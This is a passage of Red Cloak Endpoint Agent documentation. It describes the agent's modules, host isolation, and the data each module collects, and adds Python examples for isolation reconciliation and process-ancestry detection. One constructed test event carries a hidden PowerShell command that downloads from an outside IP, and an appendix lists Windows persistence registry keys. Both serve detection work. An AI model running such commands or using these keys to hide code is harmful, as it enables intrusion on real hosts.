groundling.profile_load | Smart | Groundling loads all profiles upon startup, but unloads them right after the initial scan (10-30 minutes on average) |
groundling.profile_load | Never | Groundling does not load additional user profiles, losing effectiveness |
Note
This setting must be coordinated with the inspector.profile_load value when both modules are enabled: use Always/Always, Smart/Smart or Never/Never for the two modules. Smart (Groundling) may also be combined with Never (Inspector™). The Smart value for Inspector™ is not recommended, as it can cause Windows profile issues.
Hostel Module ⫘
The Hostel module is the Red Cloak Endpoint Agent component that performs Host Isolation. Isolating an endpoint cuts off its network communication (except to Secureworks® Taegis™ XDR) to prevent a threat on an infected host from spreading laterally to healthy hosts. Once a host has been isolated and the threat removed, it can be reintegrated and given back full network access.
Isolation ⫘
While isolated, a host can communicate only with the Secureworks backend; the Hostel module on the agent carries out the isolation tasks. The agent does not persist the isolation state across restarts: it always starts with isolation disabled and is told the desired state on its first connection to the platform.
- On reboot or module restart, the host starts with isolation off.
- Once connected to the platform, the agent reports its current isolation state in a hostel heartbeat message. There may be a short delay at startup before an isolated host receives the command from the server and turns isolation back on.
- The platform compares the reported isolation state with the last configured state for the host. If the two do not match, it automatically sends the appropriate command to set or unset isolation so that the host returns to the desired state.
When the isolation module is enabled and running, an icon is displayed in the Windows system tray on each endpoint.
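The reconciliation above is a small state machine with a deliberate asymmetry: the agent forgets, the platform remembers, and the heartbeat is what brings them back into line. The following Python is an added example, not the real hostel protocol: both sides are modelled in-process so the exchange after a reboot can be stepped through (heartbeat reporting off, platform answering with an isolate command, next heartbeat agreeing). Message and command names are the example's own.

```python
"""Isolation-state reconciliation between the platform and an agent, as described above.

Added example, not the real hostel protocol: both sides are modelled in-process
and the message and command names are the example's own.
"""


class Platform:
    """Keeps the last configured (desired) isolation state for each host."""

    def __init__(self):
        self.desired = {}   # host_id -> bool
        self.reported = {}  # host_id -> bool, from the latest heartbeat

    def set_isolation(self, host_id: str, isolate: bool) -> dict:
        """Analyst action: record the desired state and build the command to send."""
        self.desired[host_id] = isolate
        return {"cmd": "isolate" if isolate else "release", "host_id": host_id}

    def on_heartbeat(self, msg: dict):
        """Compare reported with desired; return a corrective command, or None if they match."""
        host_id, reported = msg["host_id"], msg["isolated"]
        self.reported[host_id] = reported
        desired = self.desired.get(host_id, False)
        if reported == desired:
            return None
        return {"cmd": "isolate" if desired else "release", "host_id": host_id}


class Agent:
    """Isolation state lives in memory only: every restart comes back with it off."""

    def __init__(self, host_id: str):
        self.host_id = host_id
        self.isolated = False

    def restart(self):
        self.isolated = False

    def heartbeat(self) -> dict:
        return {"type": "hostel_heartbeat", "host_id": self.host_id, "isolated": self.isolated}

    def apply(self, cmd: dict):
        self.isolated = cmd["cmd"] == "isolate"


def check_in(agent: Agent, platform: Platform) -> list:
    """One check-in: send the heartbeat, apply whatever the platform sends back."""
    exchange = [agent.heartbeat()]
    cmd = platform.on_heartbeat(exchange[0])
    if cmd is not None:
        agent.apply(cmd)
        exchange.append(cmd)
    return exchange


def scenario() -> dict:
    """Isolate a host, reboot it, and show the platform restoring isolation."""
    platform, agent = Platform(), Agent("host-1")
    agent.apply(platform.set_isolation(agent.host_id, True))
    after_isolate = agent.isolated          # True
    agent.restart()
    after_restart = agent.isolated          # False: nothing persisted
    first = check_in(agent, platform)       # heartbeat says off, platform answers "isolate"
    after_first_checkin = agent.isolated    # True again
    steady = check_in(agent, platform)      # states agree, no command
    return {
        "after_isolate": after_isolate,
        "after_restart": after_restart,
        "first_checkin_msgs": len(first),
        "after_first_checkin": after_first_checkin,
        "steady_checkin_msgs": len(steady),
    }


if __name__ == "__main__":
    print(scenario())
```

The window between restart and the first heartbeat is the "short delay" mentioned above: in this model the host is unisolated for exactly that interval, which is why the platform, not the agent, must be the source of truth.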
Prerequisites for Using Host Isolation with the Red Cloak Endpoint Agent ⫘
- The Hostel module and Host Isolation are supported only for Windows OS (version 7 and higher).
- Agent version 2.0.6.0 and higher support the Hostel module.
- Host Isolation cannot be performed for hosts that have been safelisted.
- Tenant Admins and Secureworks analysts can perform Host Isolation.
For more details on using the Host Isolation feature, see Isolate a Host.
Ignition Module ⫘
The Ignition module is the software responsible for Remote Agent Upgrade, and is available beginning with Windows Agent version 2.1.4.0.
Once installed, the agent checks in with the Red Cloak Endpoint Agent backend server and uploads the agent configuration specific to that endpoint, giving the server visibility of the agent configuration on every endpoint in your domain. When a remote upgrade is made available and initiated, the Ignition module pulls down the MSI installer it needs, performs the upgrade, and reports the resulting configuration back to the server.
Inspector Module ⫘
The Inspector™ module runs Python-based rules designed to detect malware, malicious artifacts, or known behaviors and patterns on a host. The module is used with periodic scans to check the host for malicious activity on a recurring basis; by default, periodic scans run every 12 hours. The data collected by this module varies with the rule that detects the artifact, but it is similar to what the other modules collect:
- Signature Information
- File Paths
- Calculated MD5, SHA1, SHA256 values
- Creation Time
- Last Write Time
- Last Access Time
- File Size
- Associated file details
- Etc.
Configuration Settings ⫘
Red Cloak Endpoint Agent prevents external scripts from removing Windows domain user profiles, as the Inspector™ and Groundling modules load profiles for monitoring. To allow external scripts to remove domain user profiles, work with Product Support to alter the Windows Profile loading pattern for Inspector™ and Groundling via Host Command. The default value for Inspector™ is Always, with Always and Never as recommended.
Setting | Value | Description |
---|---|---|
inspector.profile_load | Always | Inspector™ loads all profiles upon startup and never unloads them |
inspector.profile_load | Smart | Inspector™ loads profiles before each scan (periodic or regular) and unloads them right after |
inspector.profile_load | Never | Inspector™ does not load additional user profiles, losing effectiveness |
Note
This setting must be coordinated with the groundling.profile_load value when both modules are enabled: use Always/Always, Smart/Smart or Never/Never for the two modules. Smart (Groundling) may also be combined with Never (Inspector™). The Smart value for Inspector™ is not recommended, as it can cause Windows profile issues.
Lacuna Module ⫘
The Lacuna module is responsible for capturing inbound and outbound network connection data, both TCP and UDP. It also captures DNS queries and their resolutions. The Lacuna module collects the following information:
Network Data (IP) ⫘
- Destination IP
- Destination Port
- Process ID
- Create Time
- End Time
- Local IP
- Local Port
- Protocol
- Bytes Sent
- Bytes Received
- Connection Direction
Network Data (DNS) ⫘
- Query Time
- Process ID
- Query Type
- Query Name
- RDATA
Mukluk Module ⫘
The Mukluk module is the core Red Cloak Endpoint Agent module. It is responsible for coordinating and managing all of the modules and settings for the agent. Mukluk is required for all deployments and handles the following tasks:
- Installs and updates services, programs, and configurations for all modules and components
- Manages inspector rules
- Handles bi-directional communications with the Red Cloak Endpoint Agent infrastructure
- Responsible for starting and stopping the Red Cloak Endpoint Agent modules
- Responsible for managing disk utilization
- Responsible for enabling and disabling modules
- Handles host commands, which allow privileged Product Support users to perform system level tasks
- Handles file fetching requests for further analysis
Procwall Module ⫘
The Procwall module is responsible for monitoring process creation events. The Procwall module collects the following information:
Process Information ⫘
- Process Create Time
- Process ID
- Parent Process ID
- Parent Process Create Time
- Image Path
- Command Line
- Username
Program Information ⫘
- File Description
- Company Name
- Product Name
- Product Version
- File Version
- Comments
- Legal Copyright
- Internal Name
- Original File Name
Signature Information ⫘
- Signature Hash
- Signature Program Name
- Signature Publisher Link
- Signature More Info Link
- Signature Serial Number
- Signature Issuer Name
- Signature Subject Name
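Procwall records the parent's create time alongside its PID for a reason that bites during investigations: Windows reuses PIDs, so a PID-only lookup can attach a child to the wrong parent once the original parent has exited. The following Python is an added example, not agent code: it builds ancestry chains keyed by (PID, create time) from constructed process-creation records with the fields above, shows what a PID-only join returns for the same child, and applies one common rule (an Office application with a shell in its descendants). The events, application lists and rule are the example's own.

```python
"""Process ancestry from Procwall fields, keyed by (PID, create time).

Added example, not agent code. PIDs are reused, which is why the parent's
create time is recorded next to its PID; the events below are constructed to
include one such reuse.
"""
import ntpath

# Constructed process creation events; field names follow the list above.
EVENTS = [
    {"pid": 1000, "create_time": "2018-10-18T10:00:00", "parent_pid": 400,
     "parent_create_time": "2018-10-18T09:00:00", "username": "CORP\\jdoe",
     "image_path": r"C:\Windows\explorer.exe", "command_line": "explorer.exe"},
    {"pid": 4120, "create_time": "2018-10-18T10:05:00", "parent_pid": 1000,
     "parent_create_time": "2018-10-18T10:00:00", "username": "CORP\\jdoe",
     "image_path": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "WINWORD.EXE /n invoice.docm"},
    {"pid": 5200, "create_time": "2018-10-18T10:06:00", "parent_pid": 4120,
     "parent_create_time": "2018-10-18T10:05:00", "username": "CORP\\jdoe",
     "image_path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -w hidden -nop -c iwr http://198.51.100.7/a"},
    # PID 4120 is reused later in the day by an unrelated process.
    {"pid": 4120, "create_time": "2018-10-18T11:00:00", "parent_pid": 1000,
     "parent_create_time": "2018-10-18T10:00:00", "username": "CORP\\jdoe",
     "image_path": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe"},
]

OFFICE = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def image_name(event: dict) -> str:
    return ntpath.basename(event["image_path"])  # ntpath handles backslashes on any OS


def ancestry(events, pid: int, create_time: str) -> list:
    """Image names from the oldest known ancestor down to the given process."""
    index = {(e["pid"], e["create_time"]): e for e in events}
    chain, key = [], (pid, create_time)
    while key in index:
        event = index[key]
        chain.append(image_name(event))
        key = (event["parent_pid"], event["parent_create_time"])
    return list(reversed(chain))


def naive_parent_image(events, pid: int) -> str:
    """What a PID-only lookup yields: the latest holder of the parent PID wins."""
    by_pid = {}
    for event in sorted(events, key=lambda e: e["create_time"]):
        by_pid[event["pid"]] = event
    return image_name(by_pid[by_pid[pid]["parent_pid"]])


def office_spawned_shells(events) -> list:
    """Processes whose ancestry runs from an Office application to a shell."""
    hits = []
    for event in events:
        chain = ancestry(events, event["pid"], event["create_time"])
        if chain[-1].lower() in SHELLS and any(p.upper() in OFFICE for p in chain[:-1]):
            hits.append((event["pid"], event["create_time"], chain))
    return hits


if __name__ == "__main__":
    print("keyed by (pid, create time):", ancestry(EVENTS, 5200, "2018-10-18T10:06:00"))
    print("keyed by pid only, parent of 5200:", naive_parent_image(EVENTS, 5200))
    print("office -> shell:", office_spawned_shells(EVENTS))
```

With the PID-only join the PowerShell child is attributed to notepad.exe and the Office-to-shell rule never fires; with the (PID, create time) key it resolves to WINWORD.EXE and does.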
Appendix ⫘
Groundling Monitored Persistence Locations ⫘
# | Category | Sub-Category | Bases | Key |
---|---|---|---|---|
1 | APPINIT DLL | APP CERT DLL | HKLM | System\CurrentControlSet\Control\Session Manager\AppCertDlls |
2 | APPINIT DLL | APP INIT DLL | HKLM | Software\Microsoft\Windows NT\CurrentVersion\Windows\Appinit_Dlls |
3 | APPINIT DLL | APP INIT DLL | HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\Appinit_Dlls |
4 | BOOT EXECUTE | BOOT EXECUTE | HKLM | System\CurrentControlSet\Control\Session Manager\BootExecute |
5 | BOOT EXECUTE | EXECUTE | HKLM | System\CurrentControlSet\Control\Session Manager\Execute |
6 | BOOT EXECUTE | S0 INITIAL COMMAND | HKLM | System\CurrentControlSet\Control\Session Manager\S0InitialCommand |
7 | BOOT EXECUTE | SERVICE CONTROL MANAGER EXTENSION | HKLM | System\CurrentControlSet\Control\ServiceControlManagerExtension |
8 | BOOT EXECUTE | SETUP EXECUTE | HKLM | System\CurrentControlSet\Control\Session Manager\SetupExecute |
9 | CODEC | CODEC INSTANCE | HKCU HKLM | Software\Classes\CLSID\{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance\* |
10 | CODEC | CODEC INSTANCE | HKCU HKLM | Software\Classes\CLSID\{7ED96837-96F0-4812-B211-F13C24117ED3}\Instance\* |
11 | CODEC | CODEC INSTANCE | HKCU HKLM | Software\Classes\CLSID\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\Instance\* |
12 | CODEC | CODEC INSTANCE | HKCU HKLM | Software\Classes\CLSID\{AC757296-3522-4E11-9862-C17BE5A1767E}\Instance\* |
13 | CODEC | CODEC INSTANCE | HKCU HKLM | Software\Wow6432Node\Classes\CLSID\{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance\* |
14 | CODEC | CODEC INSTANCE | HKCU HKLM | Software\Wow6432Node\Classes\CLSID\{7ED96837-96F0-4812-B211-F13C24117ED3}\Instance\* |
15 | CODEC | CODEC INSTANCE | HKCU HKLM | Software\Wow6432Node\Classes\CLSID\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\Instance\* |
16 | CODEC | CODEC INSTANCE | HKCU HKLM | Software\Wow6432Node\Classes\CLSID\{AC757296-3522-4E11-9862-C17BE5A1767E}\Instance\* |
17 | CODEC | DRIVER | HKLM | SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32 |
18 | CODEC | DRIVER | HKCU | Software\Microsoft\Windows NT\CurrentVersion\Drivers32 |
19 | CODEC | DRIVER | HKCU HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32 |
20 | CODEC | FILTER | HKCU HKLM | Software\Classes\Filter\* |
21 | EXPLORER | COLUMN HANDLER | HKCU HKLM | Software\Classes\*\ShellEx\ColumnHandlers\* |
22 | EXPLORER | COLUMN HANDLER | HKLM | Software\Wow6432Node\Classes\*\ShellEx\ColumnHandlers\* |
23 | EXPLORER | CONTEXT MENU | HKCU HKLM | Software\Classes\*\ShellEx\ContextMenuHandlers\* |
24 | EXPLORER | CONTEXT MENU | HKLM | Software\Wow6432Node\Classes\*\ShellEx\ContextMenuHandlers\* |
25 | EXPLORER | COPY HOOK | HKCU HKLM | Software\Classes\*\ShellEx\CopyHookHandlers\* |
26 | EXPLORER | COPY HOOK | HKLM | Software\Wow6432Node\Classes\*\ShellEx\CopyHookHandlers\* |
27 | EXPLORER | DRAG DROP | HKCU HKLM | Software\Classes\*\ShellEx\DragDropHandlers\* |
28 | EXPLORER | DRAG DROP | HKLM | Software\Wow6432Node\Classes\*\ShellEx\DragDropHandlers\* |
29 | EXPLORER | EXT SHELL FOLDER VIEW | HKCU HKLM | Software\Classes\*\ShellEx\ExtShellFolderViews\* |
30 | EXPLORER | EXT SHELL FOLDER VIEW | HKLM | Software\Wow6432Node\Classes\*\ShellEx\ExtShellFolderViews\* |
31 | EXPLORER | PROPERTY SHEET | HKCU HKLM | Software\Classes\*\ShellEx\PropertySheetHandlers\* |
32 | EXPLORER | PROPERTY SHEET | HKLM | Software\Wow6432Node\Classes\*\ShellEx\PropertySheetHandlers\* |
33 | EXPLORER | PROTOCOL FILTER | HKCU HKLM | Software\Classes\Protocols\Filter\*\CLSID |
34 | EXPLORER | PROTOCOL FILTER | HKLM | Software\Wow6432Node\Classes\Protocols\Filter\*\CLSID |
35 | EXPLORER | SHELL ICON OVERLAY | HKCU HKLM | Software\Classes\*\ShellEx\ShellIconOverlayIdentifiers\* |
36 | EXPLORER | SHELL ICON OVERLAY | HKLM | Software\Wow6432Node\Classes\*\ShellEx\ShellIconOverlayIdentifiers\* |
37 | EXPLORER | STARTMENUINTERNET | HKCU HKLM | Software\Clients\StartMenuInternet\*\shell\open\command |
38 | EXPLORER | STARTMENUINTERNET | HKLM | Software\Wow6432Node\Clients\StartMenuInternet\*\shell\open\command |
39 | EXPLORER | PROTOCOL HANDLER | HKCU HKLM | Software\Classes\Protocols\Handler\*\CLSID |
40 | EXPLORER | PROTOCOL HANDLER | HKLM | Software\Wow6432Node\Classes\Protocols\Handler\*\CLSID |
41 | EXPLORER PROTOCOL HANDLER | EXPLORER APPLICATION SHELL | HKCU HKLM | Software\Classes\Applications\*\shell\* |
42 | EXPLORER PROTOCOL HANDLER | EXPLORER APPLICATION SHELL | HKLM | Software\Wow6432Node\Classes\Applications\*\shell\* |
43 | EXPLORER PROTOCOL HANDLER | EXPLORER APPROVED SHELL EXTENSION | HKCU HKLM | Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\* |
44 | EXPLORER PROTOCOL HANDLER | EXPLORER APPROVED SHELL EXTENSION | HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\* |
45 | EXPLORER PROTOCOL HANDLER | EXPLORER CTF LANGBARADDIN | HKCU HKLM | Software\Microsoft\Ctf\LangBarAddin\*\Enable |
46 | EXPLORER PROTOCOL HANDLER | EXPLORER DESKTOP COMPONENT | HKCU | SOFTWARE\Microsoft\Internet Explorer\Desktop\Components\*\Source |
47 | EXPLORER PROTOCOL HANDLER | EXPLORER NETWORK SHARING HANDLER | HKLM | SOFTWARE\Classes\Network\SharingHandler\ |
48 | EXPLORER PROTOCOL HANDLER | EXPLORER SHARED TASK SCHEDULER | HKLM | Software\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler |
49 | EXPLORER PROTOCOL HANDLER | EXPLORER SHARED TASK SCHEDULER | HKLM | Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers |
50 | EXPLORER PROTOCOL HANDLER | EXPLORER SHARED TASK SCHEDULER | HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler |
51 | EXPLORER PROTOCOL HANDLER | EXPLORER SHARED TASK SCHEDULER | HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers |
52 | EXPLORER PROTOCOL HANDLER | EXPLORER SHELLEXECUTE HOOK | HKCU HKLM | Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\* |
53 | EXPLORER PROTOCOL HANDLER | EXPLORER SHELLEXECUTE HOOK | HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\* |
54 | EXPLORER PROTOCOL HANDLER | EXPLORER SHELLSERVICE OBJECT | HKCU HKLM | Software\Microsoft\Windows\CurrentVersion\Explorer\ShellServiceObjects\* |
55 | EXPLORER PROTOCOL HANDLER | EXPLORER SHELLSERVICE OBJECT | HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellServiceObjects\* |
56 | EXPLORER PROTOCOL HANDLER | EXPLORER SHELLSERVICE OBJECT DELAYLOAD | HKCU HKLM | Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\* |
57 | EXPLORER PROTOCOL HANDLER | EXPLORER SHELLSERVICE OBJECT DELAYLOAD | HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\* |
58 | IMAGE HIJACK | CMD AUTORUN | HKCU HKLM | Software\Microsoft\Command Processor\Autorun |
59 | IMAGE HIJACK | CMD AUTORUN | HKCU HKLM | Software\Wow6432Node\Microsoft\Command Processor\Autorun |
60 | IMAGE HIJACK | CMD STARTUP | HKCU HKLM | Software\Microsoft\Command Processor\Startup |
61 | IMAGE HIJACK | CMD STARTUP | HKCU HKLM | Software\Wow6432Node\Microsoft\Command Processor\Startup |
62 | IMAGE HIJACK | DEBUGGER | HKLM | Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options |
63 | IMAGE HIJACK | DEBUGGER | HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options |
64 | INTERNET EXPLORER | BHO | HKLM | Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects* |
65 | INTERNET EXPLORER | BHO | HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects* |
66 | INTERNET EXPLORER | DEFAULT ICON | HKCU HKLM | Software\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\NoAddOns\Command\ |
67 | INTERNET EXPLORER | DEFAULT ICON | HKCU HKLM | Software\Wow6432Node\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\NoAddOns\Command\ |
68 | INTERNET EXPLORER | EXPLORER BAR | HKCU HKLM | Software\Microsoft\Internet Explorer\Explorer Bars\** |
69 | INTERNET EXPLORER | EXPLORER BAR | HKCU HKLM | Software\Wow6432Node\Microsoft\Internet Explorer\Explorer Bars\** |
70 | INTERNET EXPLORER | EXTENSION | HKCU HKLM | Software\Microsoft\Internet Explorer\Extensions\** |
71 | INTERNET EXPLORER | EXTENSION | HKCU HKLM | Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\** |
72 | INTERNET EXPLORER | TOOLBAR | HKCU HKLM | Software\Microsoft\Internet Explorer\Toolbar\** |
73 | INTERNET EXPLORER | TOOLBAR | HKCU HKLM | Software\Wow6432Node\Microsoft\Internet Explorer\Toolbar\** |
74 | INTERNET EXPLORER | URLSEARCHHOOK | HKCU HKLM | Software\Microsoft\Internet Explorer\UrlSearchHooks\* |
75 | INTERNET EXPLORER | URLSEARCHHOOK | HKCU HKLM | Software\Wow6432Node\Microsoft\Internet Explorer\UrlSearchHooks\* |
76 | KNOWN DLL | | HKLM | System\CurrentControlSet\Control\Session Manager\KnownDlls |
77 | LOGON | | HKLM | Software\Microsoft\Windows CE Services\AutoStartOnConnect |
78 | LOGON | | HKLM | Software\Microsoft\Windows CE Services\AutoStartOnDisconnect |
79 | LOGON | | HKLM | Software\Microsoft\Windows NT\CurrentVersion\Windows\IconServiceLib |
80 | LOGON | | HKLM | Software\Microsoft\Windows NT\CurrentVersion\Windows\Logon |
81 | LOGON | | HKLM | Software\Wow6432Node\Microsoft\Windows CE Services\AutoStartOnConnect |
82 | LOGON | | HKLM | Software\Wow6432Node\Microsoft\Windows CE Services\AutoStartOnDisconnect |
83 | LOGON | | HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\IconServiceLib |
84 | LOGON | | HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\Logon |
85 | LOGON | ALTERNATE SHELL | HKLM | SYSTEM\CurrentControlSet\Control\SafeBoot\AlternateShell |
86 | LOGON | APPSETUP | HKLM | SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AppSetup |
87 | LOGON | GROUP POLICY SCRIPT | HKCU HKLM | SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Logoff\**\Script |
88 | LOGON | GROUP POLICY SCRIPT | HKCU HKLM | SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Logon\**\Script |
89 | LOGON | GROUP POLICY SCRIPT | HKLM | SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Shutdown\**\Script |
90 | LOGON | GROUP POLICY SCRIPT | HKLM | SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup\**\Script |
91 | LOGON | GROUP POLICY SCRIPT | HKCU HKLM | SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Logoff\**\Script |
92 | LOGON | GROUP POLICY SCRIPT | HKCU HKLM | SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Logon\**\Script |
93 | LOGON | GROUP POLICY SCRIPT | HKLM | SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Shutdown\**\Script |
94 | LOGON | GROUP POLICY SCRIPT | HKLM | SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\**\Script |
95 | LOGON | GROUP POLICY SCRIPT | HKCU HKLM | Software\Policies\Microsoft\Windows\System\Scripts\Logoff\**\Script |
96 | LOGON | GROUP POLICY SCRIPT | HKCU HKLM | Software\Policies\Microsoft\Windows\System\Scripts\Logon**\Script |
97 | LOGON | GROUP POLICY SCRIPT | HKLM | Software\Policies\Microsoft\Windows\System\Scripts\Shutdown**\Script |
98 | LOGON | GROUP POLICY SCRIPT | HKLM | Software\Policies\Microsoft\Windows\System\Scripts\Startup**\Script |
99 | LOGON | RUN | HKLM | SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\InitialProgram |
100 | LOGON | RUN | HKCU HKLM | Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnceEx* |
101 | LOGON | RUN | HKCU HKLM | Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnce* |
102 | LOGON | RUN | HKCU HKLM | Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run* |
103 | LOGON | RUN | HKCU HKLM | Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run* |
104 | LOGON | RUN | HKCU HKLM | Software\Microsoft\Windows\CurrentVersion\RunOnceEx* |
105 | LOGON | RUN | HKCU HKLM | Software\Microsoft\Windows\CurrentVersion\RunOnce* |
106 | LOGON | RUN | HKCU HKLM | Software\Microsoft\Windows\CurrentVersion\RunServicesOnce* |
107 | LOGON | RUN | HKCU HKLM | Software\Microsoft\Windows\CurrentVersion\RunServices* |
108 | LOGON | RUN | HKCU HKLM | Software\Microsoft\Windows\CurrentVersion\Run* |
109 | LOGON | RUN | HKCU HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnceEx* |
110 | LOGON | RUN | HKCU HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnce* |
111 | LOGON | RUN | HKCU HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run* |
112 | LOGON | RUN | HKCU HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run* |
113 | LOGON | RUN | HKCU HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx* |
114 | LOGON | RUN | HKCU HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce* |
115 | LOGON | RUN | HKCU HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce* |
116 | LOGON | RUN | HKCU HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices* |
117 | LOGON | RUN | HKCU HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run* |
118 | LOGON | SHELL | HKCU HKLM | Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell |
119 | LOGON | SHELL | HKCU HKLM | Software\Microsoft\Windows\CurrentVersion\Policies\System\Shell |
120 | LOGON | TASKMAN | HKLM | SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Taskman |
121 | LOGON | TERMINAL SERVER | HKLM | System\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\StartupPrograms |
122 | LOGON | USERINIT | HKCU | Environment\UserInitLogonScript |
123 | LOGON | USERINIT | HKCU | Environment\UserInitMprLogonScript |
124 | LOGON | USERINIT | HKLM | SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit |
125 | LOGON | USERINIT | HKLM | System\CurrentControlSet\Control\Session Manager\Environment\UserInitLogonScript |
126 | LOGON | USERINIT | HKLM | System\CurrentControlSet\Control\Session Manager\Environment\UserInitMprLogonScript |
127 | LOGON | VMAPPLET | HKLM | SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\VmApplet |
128 | LOGON ACTIVE SETUP | HKCU HKLM | Software\Microsoft\Active Setup\Installed Components*\StubPath | |
129 | LOGON ACTIVE SETUP | HKCU HKLM | Software\Wow6432Node\Microsoft\Active Setup\Installed Components*\StubPath | |
130 | LSA PROVIDER | HKLM | SYSTEM\CurrentControlSet\Control\Lsa\Authentication Packages | |
131 | LSA PROVIDER | HKLM | SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages | |
132 | LSA PROVIDER | HKLM | SYSTEM\CurrentControlSet\Control\Lsa\Security Packages | |
133 | LSA PROVIDER | HKLM | SYSTEM\CurrentControlSet\Control\SecurityProviders\SecurityProviders | |
134 | NETWORK PROVIDER | HKLM | SYSTEM\CurrentControlSet\Control\NetworkProvider\Order\ProviderOrder | |
135 | NETWORK PROVIDER | HKLM | SYSTEM\CurrentControlSet\Services*\NetworkProvider\ProviderPath | |
136 | PRINT MONITOR | HKLM | SYSTEM\CurrentControlSet\Control\Print\Monitors*\Driver | |
137 | SERVICE OR DRIVER | HKLM | SYSTEM\CurrentControlSet\Services*\ImagePath | |
138 | SERVICE OR DRIVER | HKLM | SYSTEM\CurrentControlSet\Services*\Parameters\ServiceDll | |
139 | SERVICE OR DRIVER | HKLM | SYSTEM\CurrentControlSet\Services*\Performance\Library | |
140 | SERVICE OR DRIVER | HKLM | SYSTEM\CurrentControlSet\Services*\Type | |
141 | WINLOGON | HKCU | Control Panel\Desktop\Scrnsave.exe | |
142 | WINLOGON | HKLM | SYSTEM\Setup\CmdLine | |
143 | WINLOGON | HKCU | Software\Microsoft\Windows NT\CurrentVersion\Windows\load | |
144 | WINLOGON | HKCU | Software\Microsoft\Windows NT\CurrentVersion\Windows\run | |
145 | WINLOGON | HKLM | Software\Microsoft\Windows NT\CurrentVersion\Winlogon\GinaDll | |
146 | WINLOGON | HKLM | Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LsaStart | |
147 | WINLOGON | HKLM | Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify*\DLLName | |
148 | WINLOGON | HKLM | Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SaveDumpStart | |
149 | WINLOGON | HKLM | Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ServiceControllerStart | |
150 | WINLOGON | HKLM | Software\Microsoft\Windows NT\CurrentVersion\Winlogon\System | |
151 | WINLOGON | HKLM | Software\Microsoft\Windows NT\CurrentVersion\Winlogon\UIHost | |
